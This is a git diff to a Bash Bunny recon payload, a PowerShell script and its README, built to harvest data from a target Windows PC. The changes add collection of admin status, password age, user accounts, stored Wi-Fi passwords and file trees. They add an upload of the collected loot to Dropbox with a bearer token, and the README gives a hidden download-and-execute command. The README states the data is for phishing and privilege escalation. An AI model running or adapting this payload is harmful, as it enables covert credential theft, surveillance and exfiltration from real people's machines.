diff --git a/payloads/library/recon/-BB-ADV-Recon/ADV-Recon.ps1 b/payloads/library/recon/-BB-ADV-Recon/ADV-Recon.ps1 index bfa6add7c..176ca6c77 100644 --- a/payloads/library/recon/-BB-ADV-Recon/ADV-Recon.ps1 +++ b/payloads/library/recon/-BB-ADV-Recon/ADV-Recon.ps1 @@ -46,7 +46,7 @@ if(!(Test-Path -Path $TARGETDIR )){ ############################################################################################################################################################ - function Get-fullName { + function Get-fullName { try { @@ -70,12 +70,26 @@ $FN = Get-fullName #------------------------------------------------------------------------------------------------------------------------------------ +function If-Admin { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + return "$env:UserName is in Admin Group" + } + else{ + return "$env:UserName is not in Admin Group" + } +} + +$Admin = If-Admin +#------------------------------------------------------------------------------------------------------------------------------------ + function Get-email { try { $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim() - return $email + return $email } # If no email is detected function will return backup message for sapi speak @@ -89,6 +103,36 @@ function Get-email { $EM = Get-email +#------------------------------------------------------------------------------------------------------------------------------------ +function Get-Days_Set { + + #-----VARIABLES-----# + # $pls (password last set) = the date/time their password was last changed + # $days = the number of days since their password was last changed + + try { + + $pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls + $plsPOS = $pls.IndexOf("e") + $pls = $pls.Substring($plsPOS+2).Trim() + $pls = $pls -replace ".{3}$" + $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time + $DateArray =$time.Split(".") + $days = [int]$DateArray[0] + } + + # If no password set date is detected funtion will return $null to cancel Sapi Speak + + # Write Error is just for troubleshooting + catch {Write-Error "Day password set not found" + return $null + -ErrorAction SilentlyContinue + } + + return "Password is $days old" +} + +$lastPass = Get-Days_Set #------------------------------------------------------------------------------------------------------------------------------------ function Get-GeoLocation{ @@ -121,53 +165,50 @@ $GL = Get-GeoLocation # Get nearby wifi networks -try -{ -$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() -} -catch -{ -$NearbyWifi="No nearby wifi networks detected" -} +try{$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()} + +catch{$NearbyWifi="No nearby wifi networks detected"} ############################################################################################################################################################ # Get info about pc # Get IP / Network Info -try -{ -$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content -} -catch -{ -$computerPubIP="Error getting Public IP" -} +try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content} + +catch{$computerPubIP="Error getting Public IP"} + +try{$computerIP = (Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.status -ne "Disconnected"}).IPv4Address.IPAddress} -$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} +catch{$computerIP="Error getting Local IP"} ############################################################################################################################################################ $IsDHCPEnabled = $false $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} + foreach ($Network in $Networks) { -If($network.DHCPEnabled) { -$IsDHCPEnabled = $true - } -$MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17) + If($network.DHCPEnabled) { + $IsDHCPEnabled = $true + } + $MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17) } ############################################################################################################################################################ #Get System Info $computerSystem = Get-CimInstance CIM_ComputerSystem + $computerBIOS = Get-CimInstance CIM_BIOSElement $computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List + $computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List + $computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List $computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} + $computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table ############################################################################################################################################################ @@ -180,7 +221,7 @@ $driveType = @{ 5="Compact disk "} $Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } -#Get - Com & Serial Devices +# Get - Com & Serial Devices $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table # Check RDP @@ -229,6 +270,9 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na # process first $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine +# process last +$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine + # Get Listeners / ActiveTcpConnections $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess $listener = $listener | foreach-object { @@ -244,8 +288,6 @@ $listener = $listener | foreach-object { } } | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table -# process last -$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine # service $service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName @@ -272,22 +314,54 @@ $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt" Clear-Host Write-Host +echo $PSVersionTable >> $env:TMP\$FileName +echo "" >> $env:TMP\$FileName + echo "Name:" >> $env:TMP\$FileName echo "==================================================================" >> $env:TMP\$FileName echo $FN >> $env:TMP\$FileName echo "" >> $env:TMP\$FileName + +echo $Admin >> $env:TMP\$FileName +echo "" >> $env:TMP\$FileName + echo "Email:" >> $env:TMP\$FileName echo "==================================================================" >> $env:TMP\$FileName echo $EM >> $env:TMP\$FileName echo "" >> $env:TMP\$FileName + +echo (net user) >> $env:TMP\$FileName +echo "" >> $env:TMP\$FileName + +echo (net accounts) >> $env:TMP\$FileName +echo "" >> $env:TMP\$FileName + +echo $lastPass >> $env:TMP\$FileName +echo "" >> $env:TMP\$FileName + echo "GeoLocation:" >> $env:TMP\$FileName echo "==================================================================" >> $env:TMP\$FileName echo $GL >> $env:TMP\$FileName echo "" >> $env:TMP\$FileName + echo "Nearby Wifi:" >> $env:TMP\$FileName echo "==================================================================" >> $env:TMP\$FileName echo $NearbyWifi >> $env:TMP\$FileName echo "" >> $env:TMP\$FileName + +"Network: +================================================================== +Computers MAC address: " + $MAC >> $env:TMP\$FileName +"Computers IP address: " + $computerIP >> $env:TMP\$FileName +"Public IP address: " + $computerPubIP >> $env:TMP\$FileName +"RDP: " + $RDP >> $env:TMP\$FileName +"" >> $env:TMP\$FileName + +($Network| out-string) >> $env:TMP\$FileName + +"W-Lan profiles: +=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName + $computerSystem.Name >> $env:TMP\$FileName "================================================================== Manufacturer: " + $computerSystem.Manufacturer >> $env:TMP\$FileName @@ -323,18 +397,6 @@ Capacity: " + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\$File "COM & SERIAL DEVICES: ==================================================================" + ($COMDevices | Out-String) >> $env:TMP\$FileName -"Network: -================================================================== -Computers MAC address: " + $MAC >> $env:TMP\$FileName -"Computers IP address: " + $computerIP.ipaddress[0] >> $env:TMP\$FileName -"Public IP address: " + $computerPubIP >> $env:TMP\$FileName -"RDP: " + $RDP >> $env:TMP\$FileName -"" >> $env:TMP\$FileName -($Network| out-string) >> $env:TMP\$FileName - -"W-Lan profiles: -=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName - "listeners / ActiveTcpConnections =================================================================="+ ($listener| Out-String) >> $env:TMP\$FileName @@ -357,6 +419,7 @@ Computers MAC address: " + $MAC >> $env:TMP\$FileName ############################################################################################################################################################ # Recon all User Directories + tree $Env:userprofile /a /f >> $env:TMP\$FileName ############################################################################################################################################################ @@ -374,9 +437,17 @@ vault -ErrorAction SilentlyContinue -Force ############################################################################################################################################################ -# Exfiltrate Loot +# Upload output file to dropbox -Move-Item $env:TMP\$FileName $TARGETDIR\$FileName +$TargetFilePath="/$FileName" +$SourceFilePath="$env:TMP\$FileName" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers ############################################################################################################################################################ @@ -408,4 +479,3 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue # Popup message to signal the payload is done $done = New-Object -ComObject Wscript.Shell;$done.Popup("script is done",1) - diff --git a/payloads/library/recon/-BB-ADV-Recon/README.md b/payloads/library/recon/-BB-ADV-Recon/README.md index 627c9d1ec..87deb5328 100644 --- a/payloads/library/recon/-BB-ADV-Recon/README.md +++ b/payloads/library/recon/-BB-ADV-Recon/README.md @@ -1,5 +1,13 @@ ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +

+ + + +

Table of Contents @@ -19,17 +27,34 @@ A script used to do an advanced level of Recon on the targets computer ## Description -This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. -The GeoLocation (latitude and longitude) of where the script was ran. -The SSID and WiFi password of any current or previously connected to networks. -It determines the last day they changed thier password and how many days ago. -Intel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card -Along with TREE list of all files in the target computer is gathered and uploaded to your BashBunny +This program enumerates a target PC to collect as much recon data as possible for future engagements +This includes: +* Hosts Powershell Version (to know what commands can be run) +* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected) +* Whether they are in the Admin group or not +* The email associated with their Microsoft Account (for phishing possibilities) +* Other User accounts on their system (for possible privledge escalation) +* Details on their login settings (Ex: Min/Max password age and length) +* How many days since they have changed their password (Max password age - Days since = Opportunity) +* Their GeoLocation (know their approximate where abouts) +* Nearby Wifi Networks (Possible lateral movement) +* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?) +* WLAN Profiles (List of SSIDs and Passwords stored on their PC) +* Network Interfaces (What are they connecting in and out with) +* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) +* Local Users (Accounts on system with Username, name associated with microsoft account and SID) +* Information on their HardDrives (Indicator of Recon Scope) +* COM and Serial Devices (Is there a device connected you can manipulate?) +* Active TCP Connections (Poor mans Port Scanning) +* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) +* Video Card info (how much vroom vroom?) +* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks) ## Getting Started ### Dependencies +* DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

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@@ -37,7 +62,10 @@ Along with TREE list of all files in the target computer is gathered and uploade ### Executing program * Plug in your device -* Command will be entered in the RunBox to start the ADV-Recon script +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +```

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@@ -53,37 +81,45 @@ I am Jakoby * 0.1 * Initial Release +* 0.5 + * Added additional recon capabilities

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## Contact -

I am Jakoby


- - - - - - - - - - - - - - - - - - - - Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ADV-Recon) -

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@@ -94,3 +130,7 @@ I am Jakoby * [MG](https://github.com/OMG-MG)

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